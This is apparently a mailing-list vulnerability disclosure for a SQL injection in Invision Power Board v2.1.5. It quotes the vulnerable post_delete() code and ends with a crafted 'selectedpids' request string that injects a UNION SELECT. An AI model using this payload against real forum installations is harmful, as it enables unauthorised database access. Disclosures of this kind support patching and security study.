<<< Date Index >>>     <<< Thread Index >>>

Invision Power Board v2.1.5 Remote SQL Injection



Invision Power Board v2.1.5 Remote SQL Injection

Filename                :- func_mod.php
Functionname    :- post_delete()
Lines                   :- 89 To 209

Bug Found By :- Devil-00

        Greetz :-
                Rock Master ^ Hackers Pal ^ n0m4rcy ^
                        www.securtygurus.net

[Code]

                if ( is_array( $id ) )
                {
                        if ( count($id) > 0 )
                        {
                                $pid = " IN(".implode(",",$id).")";
                        }
                        else
                        {
                                return FALSE;
                        }
                }
                else
                {
                        if ( intval($id) )
                        {
                                $pid   = "=$id";
                        }
                        else
                        {
                                return FALSE;
                        }
                }

[/CODE]

When $id = array .. the code don't check it if ( INTVAL )

[CODE]
if ( count($id) > 0 )
                        {
                                $pid = " IN(".implode(",",$id).")";
                        }
[/CODE]

Then We Can Do SQL Injection  Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 
'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 
'attachments', 'where' => "attach_pid".$pid ) );
[/CODE]

Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit 
:( Baaad :(

Exm. To Exploit

        1- First Add 2 Post
    2- Check It To Delete
        3- Edit String Query By HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION 
SELECT 1,3/*&tact=delete
[/CODE]